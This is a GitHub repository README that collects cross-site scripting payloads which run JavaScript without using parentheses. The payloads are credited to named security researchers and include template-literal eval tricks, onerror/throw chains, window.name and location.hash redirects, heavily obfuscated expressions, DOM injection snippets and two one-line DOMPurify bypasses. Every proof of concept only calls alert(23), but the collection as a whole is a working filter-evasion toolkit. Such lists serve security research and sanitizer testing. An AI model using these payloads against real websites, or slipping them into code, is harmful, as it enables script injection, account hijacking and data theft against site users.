Skip to content
Permalink
master
Switch branches/tags
Go to file
1 contributor

Users who have contributed to this file

XSS Without parentheses ()

This repo contains XSS payloads that doesn't require parentheses, collected from tweets, blogs...

All the POC's are alert box with number 23


alert`23`

window.name="javascript:alert(23)";
location="xss.html";

xss.html

location=name

Cure53

eval.call`${'alert\x2823\x29'}`

Renwa

eval.apply`${[`alert\x2823\x29`]}`

Bo0oM

setTimeout`alert\x2823\x29`
setInterval`alert\x2823\x29`

Garethheyes

onerror=alert;throw 23;

Garethheyes

var{haha:onerror=alert}=0;throw 1
var{a:onerror}={a:alert};throw 1

Garethheyes

'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}

Only Chrome Garethheyes

onerror=eval;throw'=alert\x2823\x29';

Garethheyes

{onerror=alert}throw 23

Garethheyes

[][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]`$${[!{}+[]][+[]][+!+[]]+[!{}+[]][+[]][+!+[]+!+[]]+[!{}+[]][+[]][+!+[]+!+[]+!+[]+!+[]]+[!![]+[]][+[]][+!+[]]+[!![]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]}$```//Function(alert(1))

terjanq

xss_redir.html

window.name='1;var Uncaught=1;alert(23)';
location='xss_short.html';

xss_short.html

{onerror=eval}throw/0/+name

terjanq

example.com/#1/-alert(23)/
onhashchange=setTimeout;
Object.prototype.toString=RegExp.prototype.toString;
Object.prototype.source=location.hash;
location.hash=null;

terjanq

throw/a/,Uncaught=1,g=alert,a=g+0,onerror=eval,/1/g+a[14]+[23,331,337]+a[15]

terjanq

window.name="alert(23)";
location="xss.html";

xss.html

Function`a${name}```

terjanq

Put %0aalert(/23/)// anywhere in the URL

location='javascript:'+location
location=/javascript:/.source+location
location=`javascript:`+location

terjanq

x={...eval+0,toString:Array.prototype.shift,length:15},
x+x+x+x+x+x+x+x+x+x+x+x+x,
location = /javascript:/.source + alert.name+x+23+x

terjanq

example.com/xss?%0aalert(/23/)//


Function`a${unescape. call`${location}`}```

aemkei

onhashchange=setTimeout;
HashChangeEvent.prototype.toString=
RegExp.prototype.toString;
location.hash=
HashChangeEvent.prototype.source=
'1/-alert\5023\51/';

aemkei

onload=setTimeout
Event.prototype.toString=
_=>"alert\5023\51"

aemkei

throw/**/Uncaught=window.onerror=eval,";alert\5023\51"

Gareth Heyes

x=new DOMMatrix;
matrix=alert;
x.a=23;
location='javascript'+':'+x

BitK

Function`a${`alert${Function`a${`return fromCharCode`}{fromCharCode}``${String}``40`}23${Function`a${`return fromCharCode`}{fromCharCode}``${String}``41`}`}```

BitK

range = document.createRange``; 
range.createContextualFragment`<img src=x onerror=alert\x2823\x29>'`;

BitK

Function`a${`${Function`a${`return from`}{from}``${Array}``96${Function`a${`return fromCharCode`}{fromCharCode}``${String}`}`}${Function`a${`return fromCharCode`}{fromCharCode}``${String}``${96}${10}${97}${108}${101}${114}${116}${40}${50}${51}${41}`}`}```

albinowax

window.name="alert(23)"
location="xss.html"

xss.html

eval.constructor`eval\x28name\x29```

hasegawayosuke

window.name="alert(23)"
location="xss.html"

xss.html

[].every.call`eval\x28name\x29${eval}`

Tomer Zait

[]["filter"]["constructor"]`alert\x2823\x29```

Pepe Vila

Array.prototype[Symbol.hasInstance]=eval;
"alert\x2823\x29" instanceof [];

RootEval

x='javascript:alert\x2823\x29';x={x:location}=this

iwasakinoriaki

window.name="alert(23)"
location="xss.html"

xss.html

eval.call`${top.name}`

Cure53

window.name="<img src=x onerror=alert(23)>"
location="xss.html"

xss.html

document.write`${top.name}`

mage_1868

location="https://example.com/xss.html/.source;alert(23)?xss="

example.com

eval.call`${location.pathname}`

Only Firefox Garethheyes

{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:'',message:'alert\x2823\x29'}

ycam

example.com/xss#*/;alert(23);
throw/**/onerror=Uncaught=eval,e={lineNumber:1,columnNumber:1,fileName:'',message:'/*'+location.hash},typeof/**/InstallTrigger!='undefined'?e:e.message

cgvwzq

https://demo.vwzq.net/lol.html

<script/id=Uncaught>

// chrome + firefox

throw[onerror=eval][e=[x='+alert\x2823\x29']]=0[e.lineNumber=e.columnNumber=e.fileName=e.message=x]=e

</script>

<script>

// firefox

onhashchange=setTimeout,HashChangeEvent.prototype[Symbol.toStringTag]='+alert\x2823\x29',location.hash=1

</script>

<script>

// chrome + firefox

Array.prototype[Symbol.hasInstance]=eval,'alert\x2823\x29'instanceof[]

</script>

<script>

// chrome

[onerror=eval][TypeError.prototype.name='=/']['/-alert\x2823\x29//']

</script>


<script>

// chrome

onerror=eval,ReferenceError.prototype.name='=alert\x2823\x29//',lol

</script>

physuru

elem=new Option
elem.classList.valueOf=String.prototype.charAt

elem.innerText=elem.outerHTML
elem.className=elem.innerHTML
amp=Object.__proto__.name+elem.classList

htag=new Text
elem.className=htag.nodeName
htag=Object.__proto__.name+elem.classList

elem.innerHTML=amp+htag+97
a=elem.innerText
elem.innerHTML=amp+htag+99
c=elem.innerText
elem.innerHTML=amp+htag+105
i=elem.innerText
elem.innerHTML=amp+htag+106
j=elem.innerText
elem.innerHTML=amp+htag+112
p=elem.innerText
elem.innerHTML=amp+htag+114
r=elem.innerText
elem.innerHTML=amp+htag+115
s=elem.innerText
elem.innerHTML=amp+htag+116
t=elem.innerText
elem.innerHTML=amp+htag+118
v=elem.innerText

elem.innerHTML=amp+htag+58
colon=elem.innerText

elem.innerHTML=amp+htag+40
lpar=elem.innerText
elem.innerHTML=amp+htag+41
rpar=elem.innerText

location=j+a+v+a+s+c+r+i+p+t+colon+alert.name+lpar+1+rpar

Renwa

document.body.innerHTML="\u003cimg src=x onerror=alert\u002823\u0029\u003e";

Renwa

document.body.innerHTML="&ltimg src=x onerror=alert&lpar;23&rpar;&gt"
document.body.innerHTML=document.body.innerText

If the page is frameable Renwa

data:text/html,<iframe name="<svg/onload=alert(23)>" src="http://example.com/xss?document.body.innerHTML=name">

user00239123

document.location='javascript:alert%2823%29'

Only IE matt

example.com/xss#<img src=x onerror=alert(23)>

document.body.innerHTML=location.hash;

Brutelogic

<svg/onload='alert&#40 23 &#41'> 

Blakils

location=/javascript:alert%2823%29/.source;

Nicocanicolas

http://example.com/?test=&lt;img/src=&quot;x&quot;/onerror=alert(23)&gt;

document.body.innerHTML=location.search;
document.body.innerHTML=document.body.innerText;

With Script Gadgets

Using Prorotype Pollution PP Gadgets Repo


DOMPurify Bypass Parrot

delete DOMPurify.isSupported

DOMPurify Bypass hakatashi

delete document.implementation.__proto__.createHTMLDocument

Anything: @RenwaX23